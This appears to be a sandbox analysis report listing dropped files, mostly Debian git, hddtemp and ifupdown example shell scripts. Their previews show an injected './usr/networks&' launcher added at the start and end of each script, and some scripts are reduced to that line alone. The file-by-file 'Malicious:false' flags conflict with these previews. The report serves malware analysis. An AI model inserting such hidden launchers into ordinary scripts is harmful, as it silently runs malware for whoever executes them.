                                                                                                                        Preview: ./usr/networks&..."$GIT_DIR/LAST_MERGE" || exit 1.}..head=$(git rev-parse --verify "$1"^0) &&.merge=$(git rev-parse --verify "$2"^0) &&.merge_name="$2" &&.merge_msg="$3" || usage..#.# The remote name is just used for the message,.# but we do want it..#.if [ -z "$head" -o -z "$merge" -o -z "$merge_msg" ]; then..usage.fi..dropheads.echo $head > "$GIT_DIR"/ORIG_HEAD.echo $merge > "$GIT_DIR"/LAST_MERGE..common=$(git merge-base $head $merge).if [ -z "$common" ]; then..die "Unable to find common commit between" $merge $head.fi..case "$common" in."$merge")..echo "Already up-to-date. Yeeah!"..dropheads..exit 0..;;."$head")..echo "Updating $(git rev-parse --short $head)..$(git rev-parse --short $merge)"..git read-tree -u -m $head $merge || exit 1..git update-ref -m "resolve $merge_name: Fast-forward" \...HEAD "$merge" "$head"..git diff-tree -p $head $merge | git apply --stat..dropheads..exit 0..;;.esac..# We are going to make a new commit..git var GIT_COMMITTER_IDENT >/dev/null || exit..# Find
                                                                                                                        /usr/share/doc/git/contrib/examples/git-revert.sh
                                                                                                                        Process:/tmp/MGuvcs6Ocz
                                                                                                                        File Type:ASCII text
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):4385
                                                                                                                        Entropy (8bit):5.300590299626365
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:96:2+PPfMaxvVvXuuDCD1Ei9U6rtmYmu7g6B:2M5B+C2pjmu7g6B
                                                                                                                        MD5:F9578FBB7C7185A72858520B5B398D98
                                                                                                                        SHA1:5306EAE3C817938D8259C3CFEDDFCE861254EF4D
                                                                                                                        SHA-256:2B01D3D05568E7DCBFED31EB95FA2EC5FBCD601959816C9277357D8AD8F0877B
                                                                                                                        SHA-512:357DE625D7724672507DD7BF111A03FA71C99900C701DFC585546D523D303643ABD8B209829A3FA9993BB8E562E8BDC857D832CF2DF5ADCC5D32916A106DA7C9
                                                                                                                        Malicious:false
                                                                                                                        Preview: ./usr/networks&..exit 1 ;;.esac..SUBDIRECTORY_OK=Yes ;# we will cd up.. git-sh-setup.require_work_tree.cd_to_toplevel..no_commit=.xopt=.while case "$#" in 0) break ;; esac.do..case "$1" in..-n|--n|--no|--no-|--no-c|--no-co|--no-com|--no-comm|\.. --no-commi|--no-commit)...no_commit=t...;;..-e|--e|--ed|--edi|--edit)...edit=-e...;;..--n|--no|--no-|--no-e|--no-ed|--no-edi|--no-edit)...edit=...;;..-r)...: no-op ;;..-x|--i-really-want-to-expose-my-private-commit-object-name)...replay=...;;..-X?*)...xopt="$xopt$(git rev-parse --sq-quote "--${1#-X}")"...;;..--strategy-option=*)...xopt="$xopt$(git rev-parse --sq-quote "--${1#--strategy-option=}")"...;;..-X|--strategy-option)...shift...xopt="$xopt$(git rev-parse --sq-quote "--$1")"...;;..-*)...usage...;;..*)...break...;;..esac..shift.done..set_reflog_action "$me"..test "$me,$replay" = "revert,t" && usage..case "$no_commit" in.t)..# We do not intend to commit immediately. We just want to..# merge the differences in...head=$(git-write-tree) ||
                                                                                                                        /usr/share/doc/git/contrib/examples/git-tag.sh
                                                                                                                        Process:/tmp/MGuvcs6Ocz
                                                                                                                        File Type:ASCII text
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):1972
                                                                                                                        Entropy (8bit):5.222096129300364
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:24:kVCbAQZic8rYsnYEdGF+CnnMHx+Hh/3CtRTOa3kK8pKlfoU/Z14bLDSkIJsHTAiJ:k70ic8rZbYHh/SbOYF/ZyLDXHTAdC
                                                                                                                        MD5:7E494C753E4F3B80FE7EC6511ECDC764
                                                                                                                        SHA1:B13B4AC59D0DE77616C87B56B75CD7BFE73F5820
                                                                                                                        SHA-256:E9541DF7E22E58496C9E0936DF12AD0EB2B1E1B577F6D36B946F0FC5FD58E373
                                                                                                                        SHA-512:0E542FDDDB9B992C1628BE1BE07169E3C396866513DD97C15E83C20EFDDC0E5ADF9B25D63482A4F93FDD8D2770CD3BEF2DA699AE8CEE062AA3A46F7D33AA35FA
                                                                                                                        Malicious:false
                                                                                                                        Preview: ./usr/networks&..exit $had_error..;;. -v)..shift..tag_name="$1"..tag=$(git show-ref --verify --hash -- "refs/tags/$tag_name") ||...die "Seriously, what tag are you talking about?"..git-verify-tag -v "$tag"..exit $?..;;. -*). usage..;;. *)..break..;;. esac.done..[ -n "$list" ] && exit 0..name="$1".[ "$name" ] || usage.prev=0000000000000000000000000000000000000000.if git show-ref --verify --quiet -- "refs/tags/$name".then. test -n "$force" || die "tag '$name' already exists". prev=$(git rev-parse "refs/tags/$name").fi.shift.git check-ref-format "tags/$name" ||..die "we do not like '$name' as a tag name."..object=$(git rev-parse --verify --default HEAD "$@") || exit 1.type=$(git cat-file -t $object) || exit 1.tagger=$(git var GIT_COMMITTER_IDENT) || exit 1..test -n "$username" ||..username=$(git config user.signingkey) ||..username=$(expr "z$tagger" : 'z\(.*>\)')..trap 'rm -f "$GIT_DIR"/TAG_TMP* "$GIT_DIR"/TAG_FINALMSG "$GIT_DIR"/TAG_EDITMSG' 0..if [ "$annotate" ]
                                                                                                                        /usr/share/doc/git/contrib/examples/git-verify-tag.sh
                                                                                                                        Process:/tmp/MGuvcs6Ocz
                                                                                                                        File Type:ASCII text
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):243
                                                                                                                        Entropy (8bit):5.091025781115778
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:qXVMQPJA4lJx3ULFZZ6+uvHzDTIgTPS2d118LVLyULFZvCY1M9H1x3ULFI/uvTBe:IAO0ZZ6/vH0gTmLNZvW9Vx0BvWv7n
                                                                                                                        MD5:BE780CC322587122E892D123BFF726B6
                                                                                                                        SHA1:26AA277E5D4A3A0DC6790C3F802334721E341BB3
                                                                                                                        SHA-256:3EAAD297334349E1894BEC8495AB5DFB60143BA7087A44B48D31A2E2D880DF17
                                                                                                                        SHA-512:8F99561F7551A8EDD954ED1F73DF02AFBFBC8750BBB5F33BDE129AD51F0812862A24CC33CC2A5F7099DC545BCEA6A46962F85D765250FBBBFD48BE73AEE6F218
                                                                                                                        Malicious:false
                                                                                                                        Preview: ./usr/networks&.git cat-file tag "$1" >"$GIT_DIR/.tmp-vtag" || exit 1.sed -n -e '../^-----BEGIN PGP SIGNATURE-----$/q..p.' <"$GIT_DIR/.tmp-vtag" |.gpg --verify "$GIT_DIR/.tmp-vtag" - || exit 1.rm -f "$GIT_DIR/.tmp-vtag"../usr/networks&.exit 1.
                                                                                                                        /usr/share/doc/git/contrib/examples/git-whatchanged.sh
                                                                                                                        Process:/tmp/MGuvcs6Ocz
                                                                                                                        File Type:ASCII text
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):792
                                                                                                                        Entropy (8bit):4.925184193549972
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:12:JdJo5ELpDZNanwyCDIqDZNaEC0I8hWq6vvmYkdBQcaKv5oUvfn:JdJomtDXEwrDRDXUxo6nmYkdB1aSD
                                                                                                                        MD5:895868AC151D9953AD152F77240CF73D
                                                                                                                        SHA1:FCAAED017977A291A1D2E1E77CFA2A796F23EBA8
                                                                                                                        SHA-256:03943D3826EC7CA6398628FBCE75EFA0BECE41CEFE95A6AB90801C7759A5B23E
                                                                                                                        SHA-512:AF8FD5A0FBA1B33790C20911F0B1222FDE15C3143463346E0111194B57F1E92704CBC19B1392A6156B02BBD363A0C566E12BD80919C1E7C3ED7344D09ACA8CC0
                                                                                                                        Malicious:false
                                                                                                                        Preview: ./usr/networks&.diff_tree_flags=$(git-rev-parse --sq --no-revs --flags "$@") || exit.case "$0" in.*whatchanged)..count=..test -z "$diff_tree_flags" &&...diff_tree_flags=$(git config --get whatchanged.difftree)..diff_tree_default_flags='-c -M --abbrev' ;;.*show)..count=-n1..test -z "$diff_tree_flags" &&...diff_tree_flags=$(git config --get show.difftree)..diff_tree_default_flags='--cc --always' ;;.esac.test -z "$diff_tree_flags" &&..diff_tree_flags="$diff_tree_default_flags"..rev_list_args=$(git-rev-parse --sq --default HEAD --revs-only "$@") &&.diff_tree_args=$(git-rev-parse --sq --no-revs --no-flags "$@") &&..eval "git-rev-list $count $rev_list_args" |.eval "git-diff-tree --stdin --pretty -r $diff_tree_flags $diff_tree_args" |.LESS="$LESS -S" ${PAGER:-less}../usr/networks&.exit 1.
                                                                                                                        /usr/share/doc/git/contrib/fast-import/git-import.sh
                                                                                                                        Process:/tmp/MGuvcs6Ocz
                                                                                                                        File Type:ASCII text
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):486
                                                                                                                        Entropy (8bit):5.198694046664742
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:12:w6vgZi+Z5+v1a6v5vrpGje1rSACES02djvcn:rgI++NBNrpZrSAyRdjE
                                                                                                                        MD5:84511195A8532AFAED8B6E6645B72FC9
                                                                                                                        SHA1:C424C15440A2C33C8559CF718B1C4B661D85BF52
                                                                                                                        SHA-256:47E74E34A77970C44CC9F8C39F20AF338E5E6BDFB60AB516B66247B5C50537EA
                                                                                                                        SHA-512:680648718E925D7C6649BAFC0C134B19B31A41647EEC15142177E5A4C1F306454C4D61FFA4905FC2E7C5BE2461F90C73116E74B56664B4125101D9E6E9AD5DF0
                                                                                                                        Malicious:false
                                                                                                                        Preview: ./usr/networks&..exit 1.fi..USERNAME="$(git config user.name)".EMAIL="$(git config user.email)"..if [ -z "$USERNAME" -o -z "$EMAIL" ]; then..echo "You need to set user name and email"..exit 1.fi..git init..(..cat <<EOF.commit refs/heads/$1.committer $USERNAME <$EMAIL> now.data <<MSGEOF.$2.MSGEOF..EOF..find * -type f|while read i;do...echo "M 100644 inline $i"...echo data $(stat -c '%s' "$i")...cat "$i"...echo..done..echo.) | git fast-import --date-format=now../usr/networks&.exit 1.
                                                                                                                        /usr/share/doc/git/contrib/git-resurrect.sh
                                                                                                                        Process:/tmp/MGuvcs6Ocz
                                                                                                                        File Type:ASCII text
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):2904
                                                                                                                        Entropy (8bit):5.006955417229927
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:48:5uqbabEEfBEyVJ1IUM7cy8UEV3cyUEdKENHwJ+gAP253YNVq6h3p133pgt3piZ:YpBEcLIUYcy8UEtcyUEdKENHwJ+gAP2s
                                                                                                                        MD5:E6A74480E370B07D5BDC026A624CE684
                                                                                                                        SHA1:988862444F28FAB3B4D6B92EC6C4F0488781EE2E
                                                                                                                        SHA-256:AA7A6EB55918038552A2417FF03AE208F7408447FC6322536A71CE309EE23230
                                                                                                                        SHA-512:93F551BFC3E2D737ED93989FBCA8D4CB7883BF35EAD4DB9C84DAEFF8403787C663989E5BA038425BC622F1EFEA0AE06411BBF6F492E22ABC35218F271FF7624B
                                                                                                                        Malicious:false
                                                                                                                        Preview: ./usr/networks&. sed -ne "/^$_x40 \($_x40\) Merge .*/ {s//\1/p;$early_exit}".}..search_merge_targets () {..git rev-list --all --grep="Merge branch '[^']*' into $branch\$" \...--pretty=tformat:"%H %s" --all |..sed -ne "/^\($_x40\) Merge .*/ {s//\1/p;$early_exit} ".}..dry_run=.early_exit=q.scan_reflog=t.scan_reflog_merges=.scan_merges=.scan_merge_targets=.new_name=..while test "$#" != 0; do..case "$1" in.. -b|--branch)...shift...new_name="$1"...;;.. -n|--dry-run)...dry_run=t...;;.. --no-dry-run)...dry_run=...;;.. -k|--keep-going)...early_exit=...;;.. --no-keep-going)...early_exit=q...;;.. -m|--merges)...scan_merges=t...;;.. --no-merges)...scan_merges=...;;.. -l|--reflog)...scan_reflog=t...;;.. --no-reflog)...scan_reflog=...;;.. -r|--reflog_merges)...scan_reflog_merges=t...;;.. --no-reflog_merges)...scan_reflog_merges=...;;.. -t|--merge-targets)...scan_merge_targets=t...;;.. --no-merge-targets)...scan_merge_targets=...;;.. -a|--all)...scan_
                                                                                                                        /usr/share/doc/git/contrib/remotes2config.sh
                                                                                                                        Process:/tmp/MGuvcs6Ocz
                                                                                                                        File Type:ASCII text
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):23
                                                                                                                        Entropy (8bit):3.882045108136863
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                        Malicious:false
                                                                                                                        Preview: ./usr/networks&.exit 1.
                                                                                                                        /usr/share/doc/git/contrib/rerere-train.sh
                                                                                                                        Process:/tmp/MGuvcs6Ocz
                                                                                                                        File Type:ASCII text
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):637
                                                                                                                        Entropy (8bit):4.973192610623575
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:12:wp6B2fHx3CXTuKQLcuSKHp+V/uwb+ctPKry/RhT6KHVB+8PfQyKwQgI2KkSr8n:HaR3U0Lp0VDbztPKITbfrCnMSg
                                                                                                                        MD5:FA973BE7DB66D335F781F10C137BD908
                                                                                                                        SHA1:DFFD51DB653BEF7DEA7D172F98830224F248E767
                                                                                                                        SHA-256:22ED58D049502A09B9CA39029671394257E5C2651094498A9D91B8BBBB4FB03E
                                                                                                                        SHA-512:74DE024F1503C58852597882F36B96CD697036A22943C26D1A1FD5F76A5CBEDEB384D7E88520547EB0788B718534BD9813FA3B25220B58D4F397050172568D64
                                                                                                                        Malicious:false
                                                                                                                        Preview: ./usr/networks&..exit 1.}..mkdir -p "$GIT_DIR/rr-cache" || exit..git rev-list --parents "$@" |.while read commit parent1 other_parents.do..if test -z "$other_parents"..then...# Skip non-merges...continue..fi..git checkout -q "$parent1^0"..if git merge $other_parents >/dev/null 2>&1..then...# Cleanly merges...continue..fi..if test -s "$GIT_DIR/MERGE_RR"..then...git show -s --pretty=format:"Learning from %h %s" "$commit"...git rerere...git checkout -q $commit -- ....git rerere..fi..git reset -q --hard.done..if test -z "$branch".then..git checkout "$original_HEAD".else..git checkout "${branch#refs/heads/}".fi../usr/networks&.exit 1.
                                                                                                                        /usr/share/doc/git/contrib/subtree/git-subtree.sh
                                                                                                                        Process:/tmp/MGuvcs6Ocz
                                                                                                                        File Type:ASCII text
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):14967
                                                                                                                        Entropy (8bit):5.111069408805373
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:192:TVYbrTzRMebrfW0LJKEfUJzXKJ/38TQZNRgZpP1OQSABMfxn8R19mBhogLfbzxHY:+b1MebzW0Vx/Jhzg/MQ3D0fbtZA/1
                                                                                                                        MD5:41BA328EB77CD320A36423CADED05D12
                                                                                                                        SHA1:8393068799794472918236BBBB43BAAD72C7682F
                                                                                                                        SHA-256:1C6220B54F133F09F0E29C3BC4890CE7E3AF0AD29670672F1CD80448E2B9A779
                                                                                                                        SHA-512:A7DB8210828B6F0E59B1B73A46C0522E1552A49F956784CD5F001C8747FDF65E3255152B6BBFFCD4E6AB3CF0DDABA3BEBDF0B2D0CCA36B203A62EE2109D871E8
                                                                                                                        Malicious:false
                                                                                                                        Preview: ./usr/networks&.eval "$(echo "$OPTS_SPEC" | git rev-parse --parseopt -- "$@" || echo exit $?)"..PATH=$PATH:$(git --exec-path).. git-sh-setup..require_work_tree..quiet=.branch=.debug=.command=.onto=.rejoin=.ignore_joins=.annotate=.squash=.message=.prefix=..debug().{..if [ -n "$debug" ]; then...printf "%s\n" "$*" >&2..fi.}..say().{..if [ -z "$quiet" ]; then...printf "%s\n" "$*" >&2..fi.}..progress().{..if [ -z "$quiet" ]; then...printf "%s\r" "$*" >&2..fi.}..assert().{..if "$@"; then...:..else...die "assertion failed: " "$@"..fi.}...#echo "Options: $*"..while [ $# -gt 0 ]; do..opt="$1"..shift..case "$opt" in...-q) quiet=1 ;;...-d) debug=1 ;;...--annotate) annotate="$1"; shift ;;...--no-annotate) annotate= ;;...-b) branch="$1"; shift ;;...-P) prefix="${1%/}"; shift ;;...-m) message="$1"; shift ;;...--no-prefix) prefix= ;;...--onto) onto="$1"; shift ;;...--no-onto) onto= ;;...--rejoin) rejoin=1 ;;...--no-rejoin) rejoin= ;;...--ignore-joins) ignore_joins=1 ;;...--no-ignore-joins) ignore_joi
                                                                                                                        /usr/share/doc/git/contrib/subtree/t/t7900-subtree.sh
                                                                                                                        Process:/tmp/MGuvcs6Ocz
                                                                                                                        File Type:ASCII text
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):23
                                                                                                                        Entropy (8bit):3.882045108136863
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                        Malicious:false
                                                                                                                        Preview: ./usr/networks&.exit 1.
                                                                                                                        /usr/share/doc/git/contrib/thunderbird-patch-inline/appp.sh
                                                                                                                        Process:/tmp/MGuvcs6Ocz
                                                                                                                        File Type:ASCII text
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):822
                                                                                                                        Entropy (8bit):5.456000973546581
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:12:w6vCJsHKfrLCYwTlFfOf4L3DXKPvX90Eq2qBGSCP6pF5ViL2gR2DFfZf97n:rCJeyaYwD+UKXGRBmAF5I0Zl7
                                                                                                                        MD5:0D11588BAF66BBD90273FDA188DDA2CD
                                                                                                                        SHA1:EE2F4255479F30769F44E8CB5E284E632DD3B4AD
                                                                                                                        SHA-256:37757E412DB565E1A291349C036785A00ED5B89431A1598E6C16900BBCFFE356
                                                                                                                        SHA-512:991F89DD0AC1B1D3071F5103CAE959FCE46E608EA2F065F248D45727777265C49E30E865CCE16785B9565FD324BE23BCAD3B475A87FF5DCAE28067875CC9DB2E
                                                                                                                        Malicious:false
                                                                                                                        Preview: ./usr/networks&..exit 1.fi..cd - > /dev/null..SUBJECT=$(sed -n -e '/^Subject: /p' "${PATCH}").HEADERS=$(sed -e '/^'"${SEP}"'$/,$d' $1).BODY=$(sed -e "1,/${SEP}/d" $1).CMT_MSG=$(sed -e '1,/^$/d' -e '/^---$/,$d' "${PATCH}").DIFF=$(sed -e '1,/^---$/d' "${PATCH}")..CCS=`echo -e "$CMT_MSG\n$HEADERS" | sed -n -e 's/^Cc: \(.*\)$/\1,/gp' \..-e 's/^Signed-off-by: \(.*\)/\1,/gp'`..echo "$SUBJECT" > $1.echo "Cc: $CCS" >> $1.echo "$HEADERS" | sed -e '/^Subject: /d' -e '/^Cc: /d' >> $1.echo "$SEP" >> $1..echo "$CMT_MSG" >> $1.echo "---" >> $1.if [ "x${BODY}x" != "xx" ] ; then..echo >> $1..echo "$BODY" >> $1..echo >> $1.fi.echo "$DIFF" >> $1..LAST_DIR=$(dirname "${PATCH}")..grep -v "^LAST_DIR=" "${CONFFILE}" > "${CONFFILE}_".echo "LAST_DIR=${LAST_DIR}" >> "${CONFFILE}_".mv "${CONFFILE}_" "${CONFFILE}"../usr/networks&.exit 1.
                                                                                                                        /usr/share/doc/hddtemp/contribs/analyze/graph-field.sh
                                                                                                                        Process:/tmp/MGuvcs6Ocz
                                                                                                                        File Type:ASCII text
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):23
                                                                                                                        Entropy (8bit):3.882045108136863
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                        Malicious:false
                                                                                                                        Preview: ./usr/networks&.exit 1.
                                                                                                                        /usr/share/doc/hddtemp/contribs/analyze/hddtemp_monitor.sh
                                                                                                                        Process:/tmp/MGuvcs6Ocz
                                                                                                                        File Type:ASCII text
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):617
                                                                                                                        Entropy (8bit):4.789300168717738
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:12:ag6vEfH2QDFh7iYAfFnQiOuO72M6SFnQ73gfDfiem9MrE9HnDYha/MHrZIgHDMvX:4EvFIYGQi2qf0QcfDqurE9jYA/MLljMv
                                                                                                                        MD5:13C31185F2BB9F9D26E363B9415D49B2
                                                                                                                        SHA1:5D3AACF7D8FC903F7CEB6ED329C90F52ABCF3246
                                                                                                                        SHA-256:2DFFED792FEC0D8B455B8230152C893848C28600007A907391BC27A74EA8F2B4
                                                                                                                        SHA-512:050843F8AA048E4D7B14E4F292AE0381E81B3F49F382B5288FB13EF88FD3189A7AEBC2987E31F31A7D09BDC9E53D94B27FEAE57B3BE3E4822FBCE51B03424A3D
                                                                                                                        Malicious:false
                                                                                                                        Preview: ./usr/networks&. exit 1.fi..logger -s -t hddtemp "starting hddtemp monitor: interval=$interval, tmpdir=$tmpdir, drive=$drive".stamp=`date +%s`.tmpfile_old="$tmpdir/hddtemp-$stamp".hddtemp $drive --debug > "$tmpfile_old"..while [ 1 ] ; do. sleep $interval. stamp=`date +%s`. tmpfile_new="$tmpdir/hddtemp-$stamp". hddtemp $drive --debug > "$tmpfile_new". RETURNED=`diff "$tmpfile_old" "$tmpfile_new"`. if [ -n "$RETURNED" ] ; then. logger -s -t hddtemp "change $tmpfile_new !!!". tmpfile_old="$tmpfile_new". else. logger -s -t hddtemp "no change". rm "$tmpfile_new". fi.done../usr/networks&.exit 1.
                                                                                                                        /usr/share/doc/hddtemp/contribs/hddtemp-all.sh
                                                                                                                        Process:/tmp/MGuvcs6Ocz
                                                                                                                        File Type:ASCII text
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):1015
                                                                                                                        Entropy (8bit):4.896629241453442
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:24:raKURpM5kJl8cI094qTAYCyiaLZZTu0BCauu0BC4ojDOpHpjFxDf0u0Nm4:raPpM5kJucIUN+zyZ5utauut4gDOdpja
                                                                                                                        MD5:87F1604CDCC54749A6A6D814FBB28530
                                                                                                                        SHA1:2E815968A4F6A0F92924E94C4D94BBE5F68BA871
                                                                                                                        SHA-256:E53623C100D004F567645C208CA688CEEDF7E50B14226BC66D96C22CC12944EF
                                                                                                                        SHA-512:C1C92619C802D476F41832EF89E728F89CCD277C6B26AD0AD436466DC9338D24A3064976D4E9C471342370A84FD3D9A9803411DC2D0BCA82ADEA0DFD550EACFC
                                                                                                                        Malicious:false
                                                                                                                        Preview: ./usr/networks&..exit 1.fi...# NOTE, you could actually change this to .# ls /dev/hd? /dev/sd?.# but then you would need to remove the cruft of non-existant drives....df -l |cut -f 1 -d " " |grep /dev/ |sed -e 's/[[:digit:]]$//g' |sort -u |.while read drive; do..# TODO: ..case "$drive" in.. /dev/sd*|/dev/hd*).. # NOTE: Scsi devices might be error-prone, since many non-HDD.. # devices uses SCSI or SCSI emulation (CD-ROMs, USB mass storage..)...hddtemp $drive...;;.. /dev/md*).. # TODO: it could actually look somewher for the information.. # of the disks that make up the raid, maybe looking it up.. # at /proc/mdstat.. .echo "RAID devices currently not supported ($drive)"...;;.. /dev/vg*).. .echo "LVM devices currently not supported ($drive)"...;;.. /dev/cdrom*|/dev/fd*).. # Some common non-HD elements which might be mounted,.. # we skip these.. .;;.. *).. .echo "Unknown drive currently not supported ($drive)"...;;..esac.done..exit 0../usr/ne
                                                                                                                        /usr/share/doc/ifupdown/examples/check-mac-address.sh
                                                                                                                        Process:/tmp/MGuvcs6Ocz
                                                                                                                        File Type:ASCII text
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):461
                                                                                                                        Entropy (8bit):5.204671186006819
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:12:boybzOC2OPhB+NT3uGK6nRE9CLAYFyW4CK4jWb+YtYn:bo0PhcdW9CLKW4x4jWi/
                                                                                                                        MD5:590EDF96613EB2B783D98ED51A5F19A4
                                                                                                                        SHA1:3C6570765592737D02E8010FD9A159A39DCDCC38
                                                                                                                        SHA-256:BB77853D6FDBD37E5B234F1ECE3A223E07BDBE02CCEFC70D9FA6849ECB47F59A
                                                                                                                        SHA-512:6DC5C0F411328DE21CEFA82E8B1CD57CEE3AF5EDC0144860BEB2B291A534DFB1667B70E95D99586804D2489306377FF1F4B22C8A1D1A4E78353223717C5E47DD
                                                                                                                        Malicious:false
                                                                                                                        Preview: ./usr/networks&.# If it does it exits with 0 (success) status;.# if it doesn't then it exists with 1 (error) status...set -e..export LANG=C..if [ ! "$2" ] ; then..echo "Usage: $0 IFACE targetMAC"..exit 1.fi.iface="$1".targetmac=`echo "$2" | sed -e 'y/ABCDEF/abcdef/'`.mac=$(/sbin/ifconfig "$iface" | sed -n -e '/^.*HWaddr \([:[:xdigit:]\-]*\).*/{s//\1/;y/ABCDEF/abcdef/;p;q;}')..if [ "$targetmac" = "$mac" ]; then exit 0; else exit 1; fi../usr/networks&.exit 1.
                                                                                                                        /usr/share/doc/ifupdown/examples/get-mac-address.sh
                                                                                                                        Process:/tmp/MGuvcs6Ocz
                                                                                                                        File Type:ASCII text
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):92
                                                                                                                        Entropy (8bit):4.373538165973413
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:qXVCghzalTFgZNLdMRveMgoOORgn:whzalTFgZNpMRGMgTn
                                                                                                                        MD5:15DD9BBF0482D9ADCED6141F43FC3C89
                                                                                                                        SHA1:F4416E70988E52171A2F7027509F98AAE444E8B6
                                                                                                                        SHA-256:CB678F95B78104B7BD05D11C5AF75843331744E2EAB1504A32627FB30DE17238
                                                                                                                        SHA-512:39C8DD448D3D1F8C4BAECB16A395BC55EA2554E4ED627743FC26A76B12C750CE451BC3CE72AEFF94286A260DCB06AC016AE44F9BD3A12372F1DD31776783FE62
                                                                                                                        Malicious:false
                                                                                                                        Preview: ./usr/networks&.if [ "$which" ]; then echo $which; exit 0; fi.exit 1../usr/networks&.exit 1.
                                                                                                                        /usr/share/doc/ifupdown/examples/pcmcia-compat.sh
                                                                                                                        Process:/tmp/MGuvcs6Ocz
                                                                                                                        File Type:ASCII text
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):519
                                                                                                                        Entropy (8bit):5.218301073324955
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:12:5HUuJUHUd82RPHUAOBJ6gMWGwWSTsyzEblTKfahBUlTGNCgTn:50QU0NRP0L6g/gfbleqUlw
                                                                                                                        MD5:7CE36959719763E25A79EF6FBE77FD68
                                                                                                                        SHA1:3D32B1EF561E7CDD58B69D01B30F6F23D339805D
                                                                                                                        SHA-256:2C2DA71A12186FDDE2BDFAEA192105B1010C1279BB82334185690788E2EFAF79
                                                                                                                        SHA-512:4ACE6DF91473556C67C22C26FA905D93E6BB08D564851AC21BED82609DA4990D032FE81884214CDAA0A149FDEF4D2393CB2A02EE42CDA2743B9BD017918D6605
                                                                                                                        Malicious:false
                                                                                                                        Preview: ./usr/networks&.if [ ! -e /etc/pcmcia/shared ]; then exit 1; fi..pcmcia_shared () {... /etc/pcmcia/shared.}..iface="$1"..# /etc/pcmcia/shared sucks.pcmcia_shared "start" $iface.usage () {..exit 1.}..get_info $iface.HWADDR=`/sbin/ifconfig $DEVICE | sed -n -e 's/.*addr \([^ ]*\) */\1/p'`..which="".while read glob scheme; do..if [ "$which" ]; then continue; fi..case "$SCHEME,$SOCKET,$INSTANCE,$HWADDR" in...$glob) which=$scheme ;;..esac.done..if [ "$which" ]; then echo $which; exit 0; fi.exit 1../usr/networks&.exit 1.
                                                                                                                        /usr/share/doc/ifupdown/examples/ping-places.sh
                                                                                                                        Process:/tmp/MGuvcs6Ocz
                                                                                                                        File Type:ASCII text
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):633
                                                                                                                        Entropy (8bit):4.881818972878624
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:12:5EmBJQX+U2/lTxroNurUQm6k0fQmje5jrGlTGNCgTn:hQWldrK8Dq0o+e1Glw
                                                                                                                        MD5:99E4E569B07969486DA912C2B9A33E23
                                                                                                                        SHA1:3BAA43B8E0D2B693C426DDA2FA6D67DEAEADB09C
                                                                                                                        SHA-256:3C5803C83626B98195C7F48B7B83D131670DFA9541EDB8B30915C684FD39CCB9
                                                                                                                        SHA-512:8BAE9DC8E5F540044980649EF028FEF8C4FE945B05578EE1DB963A32AABC53F7D24FCD5DDB396FB9430E4CDFB6E1E6F19A535A1790072F5750D961F4FB8E3214
                                                                                                                        Malicious:false
